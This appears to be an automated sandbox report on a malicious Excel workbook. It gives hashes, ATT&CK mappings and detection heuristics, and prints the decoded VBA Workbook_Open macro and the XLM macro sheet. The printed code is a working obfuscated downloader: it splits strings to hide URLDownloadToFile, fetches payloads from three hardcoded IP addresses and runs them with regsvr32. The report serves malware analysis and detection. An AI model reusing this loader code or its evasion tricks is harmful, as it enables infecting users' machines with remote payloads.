Office (OOXML) malware analysis — malicious · 6f95c86fcfe1ef86

MALICIOUS

Office (OOXML)

100.3 KB Created: 2015-06-05 18:17:20 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2021-11-23

MD5: 34f63488d330d8d094b3c8d578c52c8f SHA-1: fec3d606fe963e28dfa02cb7331463f80006af6b SHA-256: 6f95c86fcfe1ef86b03ac0e61e9b2df84987c8a564657bb1408605c61df08be4

250 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a Workbook_Open VBA macro that attempts to download a file using the reassembled API call URLDownloadToFile. It then attempts to execute the downloaded file using regsvr32. The presence of Excel 4.0 macros and the ClamAV detection further indicate malicious intent. The macro constructs URLs by concatenating strings, which are then used to download payloads.

Heuristics 7

ClamAV: Xls.Downloader.Docusign112101-9908076-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Downloader.Docusign112101-9908076-0
Excel 4.0 macro sheet (1 sheet(s)) critical OOXML_XLM_MACROSHEET

Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
VBA project inside OOXML medium 2 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION

VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro
Hidden worksheet (hidden) low OOXML_HIDDEN_SHEET

Excel workbook contains 1 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://190.14.37.9/ In document text (OOXML body / shared strings)
- http://51.89.115.123/In document text (OOXML body / shared strings)
- http://185.123.53.132/In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/spreadsheetml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2014/revisionIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2015/revision2In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2016/revision3In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2016/revision6In document text (OOXML body / shared strings)

Extracted artifacts 3

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	2753 bytes
SHA-256: `172f7370c8fcb432a49217e9c43e715fb65b41c22aa7a88b16448d2057383e1a`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Open() On Error Resume Next Application.ScreenUpdating = False Dim RNum As Double RNum = Rnd Sheets("Mipopla").Range("K18") = "." & "d" & "a" & "t" Sheets("Mipopla").Range("K19") = "." & "d" & "a" & "t2" Sheets("Mipopla").Range("H35") = "=" & "HA" & "L" & "T(" & ")" Sheets("Mipopla").Range("I10") = "UR" & "LD" & "ow" & "n" & "lo" & "ad" & "To" & "Fi" & "le" & "A" Sheets("Mipopla").Range("I12") = "Loster" Sheets("Mipopla").Range("G10") = "..\Popol.gors" Sheets("Mipopla").Range("G11") = "..\Popol.gors" & "1" Sheets("Mipopla").Range("G12") = "..\Popol.gors" & "2" Sheets("Mipopla").Range("G13") = "..\Popol.ocx" & "3" Sheets("Mipopla").Range("G14") = "..\Popol.ocx" & "4" Sheets("Mipopla").Range("G15") = "..\Popol.ocx" & "5" Sheets("Mipopla").Range("I17") = "regsvr32 -silent ..\Popol.gors" Sheets("Mipopla").Range("I18") = "regsvr32 -silent ..\Popol.gors" & "1" Sheets("Mipopla").Range("I19") = "regsvr32 -silent ..\Popol.gors" & "2" Sheets("Mipopla").Range("I20") = "regsvr32.exe -e -n -i:" & RNum & " ..\Popol.ocx" & "3" Sheets("Mipopla").Range("I21") = "regsvr32.exe -e -n -i:" & RNum & " ..\Popol.ocx" & "4" Sheets("Mipopla").Range("I22") = "regsvr32.exe -e -n -i:" & RNum & " ..\Popol.ocx" & "5" Sheets("Mipopla").Range("H10") = "=Loster(0,H24&K17&K18,G10,0,0)" Sheets("Mipopla").Range("H11") = "=Loster(0,H25&K17&K18,G11,0,0)" Sheets("Mipopla").Range("H12") = "=Loster(0,H26&K17&K18,G12,0,0)" Sheets("Mipopla").Range("H13") = "=Loster(0,H27&K17&K19,G13,0,0)" Sheets("Mipopla").Range("H14") = "=Loster(0,H28&K17&K19,G14,0,0)" Sheets("Mipopla").Range("H15") = "=Loster(0,H29&K17&K19,G15,0,0)" Sheets("Mipopla").Range("H9") = "=" & "REGISTER" & "(I9,I10,I11,I12,,1,9)" Sheets("Mipopla").Range("H17") = "=" & "EXEC" & "(I17)" Sheets("Mipopla").Range("H18") = "=" & "EXEC" & "(I18)" Sheets("Mipopla").Range("H19") = "=" & "EXEC" & "(I19)" Sheets("Mipopla").Range("H20") = "=" & "EXEC" & "(I20)" Sheets("Mipopla").Range("H21") = "=" & "EXEC" & "(I21)" Sheets("Mipopla").Range("H22") = "=" & "EXEC" & "(I22)" Application.Run Sheets("Mipopla").Range("H1") End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True
`vbaProject_00.bin`	vba-project	OOXML VBA project: xl/vbaProject.bin	12800 bytes
SHA-256: `c881db5a059c142f453ebcc0d4d8849519f20cee6d7a13ba47f1d7d8791f5d9c`
`xlm_sheet_00.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/intlsheet1.xml	2902 bytes
SHA-256: `b8bb26d25a43536d60b18189ba98cdb10cd5288a407cf4ee4b20e0b86bff9999`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{00000000-0001-0000-0100-000000000000}"><dimension ref="H9:K29"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="16384" width="9.140625" style="2"/></cols><sheetData><row r="9" spans="9:9" x14ac:dyDescent="0.25"><c r="I9" s="2" t="s"><v>0</v></c></row><row r="11" spans="9:9" x14ac:dyDescent="0.25"><c r="I11" s="2" t="s"><v>1</v></c></row><row r="17" spans="8:11" x14ac:dyDescent="0.25"><c r="K17" s="2"><f>NOW()</f><v>44508.557876273146</v></c></row><row r="24" spans="8:11" x14ac:dyDescent="0.25"><c r="H24" s="2" t="str"><f>"h"&"t"&"t"&"p"&":"&"/"&"/"&"190"&"."&"14"&"."&"37"&"."&"9/"</f><v>http://190.14.37.9/</v></c></row><row r="25" spans="8:11" x14ac:dyDescent="0.25"><c r="H25" s="2" t="str"><f>"h"&"t"&"t"&"p"&":"&"/"&"/"&"51"&"."&"89"&"."&"115"&"."&"123/"</f><v>http://51.89.115.123/</v></c></row><row r="26" spans="8:11" x14ac:dyDescent="0.25"><c r="H26" s="2" t="str"><f>"h"&"t"&"t"&"p"&":"&"/"&"/"&"185"&"."&"123"&"."&"53"&"."&"132/"</f><v>http://185.123.53.132/</v></c></row><row r="27" spans="8:11" x14ac:dyDescent="0.25"><c r="H27" s="2" t="str"><f>"h"&"t"&"t"&"p"&":"&"/"&"/"&"190"&"."&"14"&"."&"37"&"."&"9/"</f><v>http://190.14.37.9/</v></c></row><row r="28" spans="8:11" x14ac:dyDescent="0.25"><c r="H28" s="2" t="str"><f>"h"&"t"&"t"&"p"&":"&"/"&"/"&"51"&"."&"89"&"."&"115"&"."&"123/"</f><v>http://51.89.115.123/</v></c></row><row r="29" spans="8:11" x14ac:dyDescent="0.25"><c r="H29" s="2" t="str"><f>"h"&"t"&"t"&"p"&":"&"/"&"/"&"185"&"."&"123"&"."&"53"&"."&"132/"</f><v>http://185.123.53.132/</v></c></row></sheetData><pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/><pageSetup paperSize="9" orientation="portrait" r:id="rId1"/></xm:macrosheet>

Open this report in the interactive analyzer, or submit your own file for analysis.